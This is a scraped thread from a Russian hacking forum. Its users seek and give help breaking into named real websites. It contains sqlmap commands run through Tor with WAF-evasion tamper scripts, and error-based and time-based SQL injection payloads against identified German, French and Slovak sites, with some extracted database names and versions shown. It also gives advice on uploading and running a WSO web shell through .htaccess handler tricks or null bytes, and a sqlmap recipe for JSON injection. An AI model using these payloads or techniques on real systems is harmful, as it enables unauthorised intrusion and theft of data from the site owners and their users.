jino.ru https://myadmin.jino.ru

masterhost.ru https://phpmyadmin.masterhost.ru

reg.ru https://serverXX.hosting.reg.ru/phpmyadmin/

sprinthost.ru https://pma.sprinthost.ru/index.php

nic.ru https://pma.nic.ru

TimeWeb https://servername.timeweb.ru/pma/, где servername - имя сервера

TimeWeb https://pulcher.timeweb.ru/pma https://cronus.timeweb.ru/pma https://betsy.timeweb.ru/pma (https://pulcher.timeweb.ru/pmahttps://cronus.timeweb.ru/pmahttps://betsy.timeweb.ru/pma)

Help


Code:
https://www.castagniccia-maremonti.com/index.php?id=26+order+by+7+--+&type_page=detail_affaires

DezMond™ said:
↑ (https://antichat.live/posts/4444754/)
Help

Code:
https://www.castagniccia-maremonti.com/index.php?id=26+order+by+7+--+&type_page=detail_affaires





sqlmap --url="
https://www.castagniccia-maremonti.com/index.php?id=26*&type_page=detail_affaires
" --random-agent --tor --tor-port=9150 --tor-type=SOCKS5 --threads=10 --dbms=Mysql --tamper="between,randomcase,space2comment" --keep-alive waf --dbs --batch
......
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
https://www.castagniccia-maremonti.com:443/index.php?id=26
' AND (SELECT 9803 FROM (SELECT(SLEEP(10)))QnOf) AND 'SbQB'='SbQB&type_page=detail_affaires
---
......
available databases [2]:
`otcmm-taxesejour`
information_schema

Доброго времени всем. Подскажите пожалуйста по не скольким вопросам. Есть сайт. Из админки есть возможность делать импорт в базу данных.

Возможно ли как-то получить шелл? Пути не известны.

Так же есть возможность загружать файлы, но в чистом виде .php файл грузиться не хочет.

Переименовав к примеру в .php3 загрузка происходит. С добавлением рандомного имени в конце.

Пример: wso.php3.53aadaa50075c72420b8656f14b0b68c

При переходе по ссылке, шелл не отображается, а происходит скачивание.

С этим можно что-то сделать? Заранее благодарен.

polzunki said:
↑ (https://antichat.live/posts/4445032/)
Доброго времени всем. Подскажите пожалуйста по не скольким вопросам. Есть сайт. Из админки есть возможность делать импорт в базу данных.
Возможно ли как-то получить шелл? Пути не известны.
Так же есть возможность загружать файлы, но в чистом виде .php файл грузиться не хочет.
Переименовав к примеру в .php3 загрузка происходит. С добавлением рандомного имени в конце.
Пример: wso.php3.53aadaa50075c72420b8656f14b0b68c
При переходе по ссылке, шелл не отображается, а происходит скачивание.
С этим можно что-то сделать? Заранее благодарен.


конечно, импорт бд - добавляем учетку + привилегии путем импорта юзера или замены. Выолнить подобное на уровне mysql маровероятно, с давних версий по дефолту ограничена скуля с работой в файловой. Если конечно речь об mysql

по аплоуду попробуй в случае апача .htaccess пропиши с расширением уже залитого файла выполнять как скрипт


Code:

SetHandler application/x-httpd-php


определяй где выполняется проверка (клаинт сайд/сервер сайд), байпасы не только на одном расширении заканчивается. Проще всего посмотреть вендра данного "чуда" и сбегать на сплойт-дб

lifescore said:
↑ (https://antichat.live/posts/4445169/)
конечно, импорт бд - добавляем учетку + привилегии путем импорта юзера или замены. Выолнить подобное на уровне mysql маровероятно, с давних версий по дефолту ограничена скуля с работой в файловой. Если конечно речь об mysql
по аплоуду попробуй в случае апача .htaccess пропиши с расширением уже залитого файла выполнять как скрипт

Code:

SetHandler application/x-httpd-php


определяй где выполняется проверка (клаинт сайд/сервер сайд), байпасы не только на одном расширении заканчивается. Проще всего посмотреть вендра данного "чуда" и сбегать на сплойт-дб


А можно ли тут через нуль байт в имени файла работать?

Это ведь, по идее, должно отрезать то, что добавляется в конце?

qwaszx000 said:
↑ (https://antichat.live/posts/4445230/)
А можно ли тут через нуль байт в имени файла работать?
Это ведь, по идее, должно отрезать то, что добавляется в конце?


От версии php зависит.

Помогите обойти ваф


Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector%5Btagevent%5D%5B%5D =25'

DezMond™ said:
↑ (https://antichat.live/posts/4445428/)
Помогите обойти ваф

Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector%5Btagevent%5D%5B%5D =25'





Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and(extractvalue/*a*/(0x0a,user/*a*/()))%23

Code:
{"error":{"name":"SequelizeDatabaseError","message":"invalid input value for enum enum_user_order_entry_preferences_order_type_optio n: \"METAL'\"","parent":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"original":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"}}

это sql?

brown said:
↑ (https://antichat.live/posts/4445501/)

Code:
{"error":{"name":"SequelizeDatabaseError","message":"invalid input value for enum enum_user_order_entry_preferences_order_type_optio n: \"METAL'\"","parent":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"original":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"}}

это sql?


это json ответ по существу и конкретике ))

троллинг тут не приветствуется наверно

По сабжу, пример с этой же ORM

https://www.aldeid.com/wiki/TryHackMe-OWASP-Juice-Shop

brown said:
↑ (https://antichat.live/posts/4445501/)

Code:
{"error":{"name":"SequelizeDatabaseError","message":"invalid input value for enum enum_user_order_entry_preferences_order_type_optio n: \"METAL'\"","parent":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"original":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"}}

это sql?


Похоже, что это не инъекция. ORM сообщает, что значение невалидно, т.е. нет в перечисляемом типе. Остальное, а конкретно вид SQL запроса, скорее всего испольуется для наглядной отладки, не более того.

Здравствуйте, есть актуальная программа, которая проверит порты на наличие уязвимостей?

Code:
sh -c grep SYN_RECV /tmp/check_ddos.res | awk {'print $5'}

Есть такой скрипт от рута, кто хорошо дружит с AWK подскажите есть ли возможность исполнить свой код, или записать в файл данные подставленные в $5? При условии что Файл доступен на запись

из man awk:


Code:
print Print the current record. The output record is terminated with the value of ORS.

print expr-list Print expressions. Each expression is separated by the value of OFS. The output record is terminated with the value of ORS.

print expr-list >file Print expressions on file. Each expression is separated by the value of OFS. The output record is terminated with the value of
ORS.

printf fmt, expr-list Format and print. See The printf Statement, below.

printf fmt, expr-list >file
Format and print on file.

b3 said:
↑ (https://antichat.live/posts/4446816/)

Code:
sh -c grep SYN_RECV /tmp/check_ddos.res | awk {'print $5'}

Есть такой скрипт от рута, кто хорошо дружит с AWK подскажите есть ли возможность исполнить свой код, или записать в файл данные подставленные в $5? При условии что Файл доступен на запись
из man awk:

Code:
print Print the current record. The output record is terminated with the value of ORS.

print expr-list Print expressions. Each expression is separated by the value of OFS. The output record is terminated with the value of ORS.

print expr-list >file Print expressions on file. Each expression is separated by the value of OFS. The output record is terminated with the value of
ORS.

printf fmt, expr-list Format and print. See The printf Statement, below.

printf fmt, expr-list >file
Format and print on file.



на мой взгляд нет (https://www.hackerone.com/blog/how-to-command-injections), так как вы не имеете возможность манипулировать саму строку для awk. Получается что-то вроде prepared statements для скули, даже если параметры манипулировать, то они не исполняются.


Code:
test@test: cat /tmp/check_ddos.res
SYN_RECV `whoami` ;whoami |whoami $(whoami) &&whoami ;{whoami}
test@test: grep SYN_RECV /tmp/check_ddos.res | awk {'print $1 $2 $3 $4 $5 $6 $7'}
SYN_RECV`whoami`;whoami|whoami$(whoami)&&whoami;{whoami}

подскажите как limit можно обойти?


Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and(extractvalue/*a*/(null,concat/*a*/(1,(select+username+from+be_users+limit+0,1))))%23

Доброго всем.

Opencart. Версия не известна.

Могу залить файлы через catalog/download

Но, только те, что закодированы ионкубом. При переходе по ссылке, отображается закодированный код.

Так же если меняю расширение на wso.php.jpg файл не заливается. Проверка идёт по содержимому заливаемого файла.

Перепробовал все обфусцированные шеллы, что только смог найти, заливаются только те, где не содержится $dPassword

[QUOTE="polzunki"]
polzunki said:
↑ (https://antichat.live/posts/4448430/)
И просьба подсказать, как зайти на этот шелл?
[CODE]
Code:
$dPassword$dPassword.

Потомм данные d ксорятся с ключом pass, распаковываются и выполняются.

Помогите раскрутить


Code:
https://www.illingen.de/corona'

DezMond™ said:
↑ (https://antichat.live/posts/4448905/)
Помогите раскрутить

Code:
https://www.illingen.de/corona'



_ww.illingen.de/corona')or(ExtractValue(1,concat_ws(0x3a,version() )))=('1


XPATH syntax error: '.33-0ubuntu0.16.04.1'

Hi

Can u help to bypass and contunie this sqli with sqlmap ?

.SpoilerTarget" type="button">Spoiler: POST request
POST /sendtwofactor.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: https://setup.sk/

Cookie: PHPSESSID=961073f8435f8bee3b34b3e6b4ff6c48;lng=en

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate

Content-Length: 40

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari>

Host: setup.sk

Connection: Keep-alive

login=if(now()=sysdate()%2Csleep(6)%2C0)

at this moment sqlmap can not dump dbs, and I tried some tamper scripts also

Thanks !

Добрый день, подскажите пожалуйста.

Есть сайт, уязвимость в json нашел с помощью acunetix

Отчет такой


Code:
POST site.com/api/R/countTabs HTTP/1.1
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: sails.sid=s%3AIEeBmBWMv6pkUjHoX13K94m6bsxyZETu.mAj wObh334BpSZtHzJN1nY4HBjL%2Fiyt3uvwTjN6K5pQ;rtl=0;n oAuthLanguage=%7B%22languageId%22%3A2%2C%22languag eName%22%3A%22ru%22%7D;44cc0ec1aaa79f8d1d2757739ec 41b84=1;favorites=j%3A%5B%2216880%22%5D;csrftoken= uq60dSDyNfzDlNREVBpktbbTqAxQDhPrfH3WQqvmfCw8ZgcqVZ kYF91wKftnxCcS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host:site.com
Connection: Keep-alive

{"where":{"chart":{"not":"[]"},"invisible":"0 RLIKE (SELECT (CASE WHEN (1+1-2+000194=2+2-4+000194) THEN 1 ELSE 0x28 END)) -- "},"tab":"growth"}

Так вот, чем крутить такое? Точнее через что?

Duble said:
↑ (https://antichat.live/posts/4451356/)
Добрый день, подскажите пожалуйста.
Есть сайт, уязвимость в json нашел с помощью acunetix
Отчет такой

Code:
POST site.com/api/R/countTabs HTTP/1.1
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Cookie: sails.sid=s%3AIEeBmBWMv6pkUjHoX13K94m6bsxyZETu.mAj wObh334BpSZtHzJN1nY4HBjL%2Fiyt3uvwTjN6K5pQ;rtl=0;n oAuthLanguage=%7B%22languageId%22%3A2%2C%22languag eName%22%3A%22ru%22%7D;44cc0ec1aaa79f8d1d2757739ec 41b84=1;favorites=j%3A%5B%2216880%22%5D;csrftoken= uq60dSDyNfzDlNREVBpktbbTqAxQDhPrfH3WQqvmfCw8ZgcqVZ kYF91wKftnxCcS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 143
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host:site.com
Connection: Keep-alive

{"where":{"chart":{"not":"[]"},"invisible":"0 RLIKE (SELECT (CASE WHEN (1+1-2+000194=2+2-4+000194) THEN 1 ELSE 0x28 END)) -- "},"tab":"growth"}

Так вот, чем крутить такое? Точнее через что?


так как стало самому интересно, решил потестить, в общем если коротко, то скульмап распознаёт что имеет дело с JSON, и указывать заголовки не обязательно. В том месте где находится инъекция (в вашем случае "invisible") вставляете просто звёздочку (*) и смотря что за запрос, можно поставить дефолтовое знание через prefix (например --prefix=0):


Code:
sqlmap -u 'http://site.com/api/R/countTabs' -H 'Content-Type: application/json;charset=UTF-8' --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --prefix=0

Что-бы потестить поднял простой скрипт:

.SpoilerTarget" type="button">Spoiler: Тестовая площадка
Данные в базе:


Code:
CREATE DATABASE testdb;
CREATE USER IF NOT EXISTS 'testuser'@'localhost' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON testdb.* TO 'testuser'@'localhost';
FLUSH PRIVILEGES;
CREATE TABLE users(id INT AUTO_INCREMENT PRIMARY KEY, firstname VARCHAR(255) NOT NULL, lastname VARCHAR(255) NOT NULL, active BOOLEAN NOT NULL DEFAULT FALSE);
INSERT INTO users(firstname,lastname,active) VALUES('Ivan','Test',0);
INSERT INTO users(firstname,lastname,active) VALUES('John','Doe',0);
INSERT INTO users(firstname,lastname,active) VALUES('Test','Admin',1);

Само "приложение" с JSON (естественно с отладкой и кривое и косое)...


Code:
connect_error) {
die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";
}catch(mysqli_sql_exception $e){
throw $e;
}

# Deprecated since PHP5.6 and removed since PHP7
# https://www.php.net/manual/pt_BR/reserved.variables.httprawpostdata.php
#var_dump($HTTP_RAW_POST_DATA);

$inputJSON = file_get_contents('php://input');
var_dump($inputJSON);

$jsonOBJ = json_decode($inputJSON);

var_dump($jsonOBJ);

$invisible_var = $jsonOBJ->{"where"}->{"invisible"};

var_dump($invisible_var);

$sql = 'SELECT id,firstname,lastname FROM users WHERE active=' . $invisible_var;
printf("SQL query: ".$sql);
$conn->real_query($sql);
if ($result = $conn->use_result()) {
foreach ($result as $row) {
echo "\nid = " . $row['id'] . " firstname = " . $row['firstname'] . " lastname = " .$row['lastname'];
}
/* free result set */
$result->close();
}

$conn->close();
?>

Поднимаем локальный пых-сервер в папке с "приложением" (у меня оно лежит под json_server.php)


Code:
php -S localhost:1234

Теперь тест от руки:


Code:
curl -X POST -d '{"where":{"chart":{"not":"[]"},"invisible":"0"},"tab":"growth"}' -H 'Content-Type: application/json;charset=UTF-8' http://localhost:1234/json_server.php
--------------------------------
Connected successfullystring(63) "{"where":{"chart":{"not":"[]"},"invisible":"0"},"tab":"growth"}"
object(stdClass)#4 (2) {
["where"]=>
object(stdClass)#3 (2) {
["chart"]=>
object(stdClass)#2 (1) {
["not"]=>
string(2) "[]"
}
["invisible"]=>
string(1) "0"
}
["tab"]=>
string(6) "growth"
}
string(1) "0"
SQL query: SELECT id,firstname,lastname FROM users WHERE active=0
id = 1 firstname = Ivan lastname = Test
id = 2 firstname = John lastname = Doe

Теперь простейшая иньекция:


Code:
curl -X POST -d '{"where":{"chart":{"not":"[]"},"invisible":"0 OR 1=1"},"tab":"growth"}' -H 'Content-Type: application/json;charset=UTF-8' http://testserver:1234/json_server.php
------------------------------------
Connected successfullystring(70) "{"where":{"chart":{"not":"[]"},"invisible":"0 OR 1=1"},"tab":"growth"}"
object(stdClass)#4 (2) {
["where"]=>
object(stdClass)#3 (2) {
["chart"]=>
object(stdClass)#2 (1) {
["not"]=>
string(2) "[]"
}
["invisible"]=>
string(8) "0 OR 1=1"
}
["tab"]=>
string(6) "growth"
}
string(8) "0 OR 1=1"
SQL query: SELECT id,firstname,lastname FROM users WHERE active=0 OR 1=1
id = 1 firstname = Ivan lastname = Test
id = 2 firstname = John lastname = Doe
id = 3 firstname = Test lastname = Admin

Дальше запускаем Бурп и в другой консоли/терминале запускаем скульмап:


Code:
sqlmap -u 'http://testserver:1234/json_server.php' --dbms=mysql --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --proxy='/'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[18:40:18] [INFO] flushing session file
[18:40:18] [INFO] testing connection to the target URL
[18:40:18] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:40:18] [INFO] testing if the target URL content is stable
[18:40:18] [INFO] target URL content is stable
[18:40:18] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic
[18:40:18] [WARNING] (custom) POST parameter 'JSON #1*' does not appear to be dynamic
[18:40:18] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable
[18:40:18] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*'
[18:40:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:40:19] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:40:19] [INFO] testing 'Generic inline queries'
[18:40:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:40:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:40:19] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[18:40:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:40:20] [WARNING] (custom) POST parameter 'JSON #1*' does not seem to be injectable
[18:40:20] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

При этом без прификса скульмап не смог раскрутить скулю


Code:
sqlmap -u 'http://testserver:1234/json_server.php' --dbms=mysql --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --proxy='/' --flush-session --prefix=0
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[18:43:08] [INFO] flushing session file
[18:43:08] [INFO] testing connection to the target URL
[18:43:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:43:08] [INFO] testing if the target URL content is stable
[18:43:09] [INFO] target URL content is stable
[18:43:09] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic
[18:43:09] [INFO] (custom) POST parameter 'JSON #1*' appears to be dynamic
[18:43:09] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable
[18:43:09] [INFO] heuristic (XSS) test shows that (custom) POST parameter 'JSON #1*' might be vulnerable to cross-site scripting (XSS) attacks
[18:43:09] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*'
[18:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:43:09] [WARNING] reflective value(s) found and filtering out
[18:43:09] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:43:09] [INFO] testing 'Generic inline queries'
[18:43:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:43:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:43:09] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[18:43:19] [INFO] (custom) POST parameter 'JSON #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:43:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:43:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:43:25] [INFO] target URL appears to be UNION injectable with 3 columns
[18:43:25] [INFO] (custom) POST parameter 'JSON #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) POST parameter 'JSON #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection point(s) with a total of 55 HTTP(s) requests:
---
Parameter: JSON #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"where":{"chart":{"not":"[]"},"invisible":"0 AND (SELECT 8656 FROM (SELECT(SLEEP(5)))iyJH)"},"tab":"growth"}

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: {"where":{"chart":{"not":"[]"},"invisible":"0 UNION ALL SELECT CONCAT(0x7170786b71,0x697a4b487962727759494a414871 686b654176576663644e4b55574770616b786a66626f617a6d 47,0x716b707871),NULL,NULL-- -"},"tab":"growth"}
---
[18:43:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.15
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

fandor9 said:
↑ (https://antichat.live/posts/4451665/)
так как стало самому интересно, решил потестить, в общем если коротко, то скульмап распознаёт что имеет дело с JSON, и указывать заголовки не обязательно. В том месте где находится инъекция (в вашем случае "invisible") вставляете просто звёздочку (*) и смотря что за запрос, можно поставить дефолтовое знание через prefix (например --prefix=0):

Code:
sqlmap -u 'http://site.com/api/R/countTabs' -H 'Content-Type: application/json;charset=UTF-8' --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --prefix=0

Что-бы потестить поднял простой скрипт:
Spoiler: Тестовая площадка
Данные в базе:

Code:
CREATE DATABASE testdb;
CREATE USER IF NOT EXISTS 'testuser'@'localhost' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON testdb.* TO 'testuser'@'localhost';
FLUSH PRIVILEGES;
CREATE TABLE users(id INT AUTO_INCREMENT PRIMARY KEY, firstname VARCHAR(255) NOT NULL, lastname VARCHAR(255) NOT NULL, active BOOLEAN NOT NULL DEFAULT FALSE);
INSERT INTO users(firstname,lastname,active) VALUES('Ivan','Test',0);
INSERT INTO users(firstname,lastname,active) VALUES('John','Doe',0);
INSERT INTO users(firstname,lastname,active) VALUES('Test','Admin',1);

Само "приложение" с JSON (естественно с отладкой и кривое и косое)...

Code:
connect_error) {
die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";
}catch(mysqli_sql_exception $e){
throw $e;
}

# Deprecated since PHP5.6 and removed since PHP7
# https://www.php.net/manual/pt_BR/reserved.variables.httprawpostdata.php
#var_dump($HTTP_RAW_POST_DATA);

$inputJSON = file_get_contents('php://input');
var_dump($inputJSON);

$jsonOBJ = json_decode($inputJSON);

var_dump($jsonOBJ);

$invisible_var = $jsonOBJ->{"where"}->{"invisible"};

var_dump($invisible_var);

$sql = 'SELECT id,firstname,lastname FROM users WHERE active=' . $invisible_var;
printf("SQL query: ".$sql);
$conn->real_query($sql);
if ($result = $conn->use_result()) {
foreach ($result as $row) {
echo "\nid = " . $row['id'] . " firstname = " . $row['firstname'] . " lastname = " .$row['lastname'];
}
/* free result set */
$result->close();
}

$conn->close();
?>

Поднимаем локальный пых-сервер в папке с "приложением" (у меня оно лежит под json_server.php)

Code:
php -S localhost:1234

Теперь тест от руки:

Code:
curl -X POST -d '{"where":{"chart":{"not":"[]"},"invisible":"0"},"tab":"growth"}' -H 'Content-Type: application/json;charset=UTF-8' http://localhost:1234/json_server.php
--------------------------------
Connected successfullystring(63) "{"where":{"chart":{"not":"[]"},"invisible":"0"},"tab":"growth"}"
object(stdClass)#4 (2) {
["where"]=>
object(stdClass)#3 (2) {
["chart"]=>
object(stdClass)#2 (1) {
["not"]=>
string(2) "[]"
}
["invisible"]=>
string(1) "0"
}
["tab"]=>
string(6) "growth"
}
string(1) "0"
SQL query: SELECT id,firstname,lastname FROM users WHERE active=0
id = 1 firstname = Ivan lastname = Test
id = 2 firstname = John lastname = Doe

Теперь простейшая иньекция:

Code:
curl -X POST -d '{"where":{"chart":{"not":"[]"},"invisible":"0 OR 1=1"},"tab":"growth"}' -H 'Content-Type: application/json;charset=UTF-8' http://testserver:1234/json_server.php
------------------------------------
Connected successfullystring(70) "{"where":{"chart":{"not":"[]"},"invisible":"0 OR 1=1"},"tab":"growth"}"
object(stdClass)#4 (2) {
["where"]=>
object(stdClass)#3 (2) {
["chart"]=>
object(stdClass)#2 (1) {
["not"]=>
string(2) "[]"
}
["invisible"]=>
string(8) "0 OR 1=1"
}
["tab"]=>
string(6) "growth"
}
string(8) "0 OR 1=1"
SQL query: SELECT id,firstname,lastname FROM users WHERE active=0 OR 1=1
id = 1 firstname = Ivan lastname = Test
id = 2 firstname = John lastname = Doe
id = 3 firstname = Test lastname = Admin

Дальше запускаем Бурп и в другой консоли/терминале запускаем скульмап:

Code:
sqlmap -u 'http://testserver:1234/json_server.php' --dbms=mysql --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --proxy='/'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[18:40:18] [INFO] flushing session file
[18:40:18] [INFO] testing connection to the target URL
[18:40:18] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:40:18] [INFO] testing if the target URL content is stable
[18:40:18] [INFO] target URL content is stable
[18:40:18] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic
[18:40:18] [WARNING] (custom) POST parameter 'JSON #1*' does not appear to be dynamic
[18:40:18] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable
[18:40:18] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*'
[18:40:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:40:19] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:40:19] [INFO] testing 'Generic inline queries'
[18:40:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:40:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:40:19] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[18:40:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:40:20] [WARNING] (custom) POST parameter 'JSON #1*' does not seem to be injectable
[18:40:20] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

При этом без прификса скульмап не смог раскрутить скулю

Code:
sqlmap -u 'http://testserver:1234/json_server.php' --dbms=mysql --data='{"where":{"chart":{"not":"[]"},"invisible":"*"},"tab":"growth"}' --proxy='/' --flush-session --prefix=0
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[18:43:08] [INFO] flushing session file
[18:43:08] [INFO] testing connection to the target URL
[18:43:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:43:08] [INFO] testing if the target URL content is stable
[18:43:09] [INFO] target URL content is stable
[18:43:09] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic
[18:43:09] [INFO] (custom) POST parameter 'JSON #1*' appears to be dynamic
[18:43:09] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable
[18:43:09] [INFO] heuristic (XSS) test shows that (custom) POST parameter 'JSON #1*' might be vulnerable to cross-site scripting (XSS) attacks
[18:43:09] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*'
[18:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:43:09] [WARNING] reflective value(s) found and filtering out
[18:43:09] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:43:09] [INFO] testing 'Generic inline queries'
[18:43:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:43:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:43:09] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
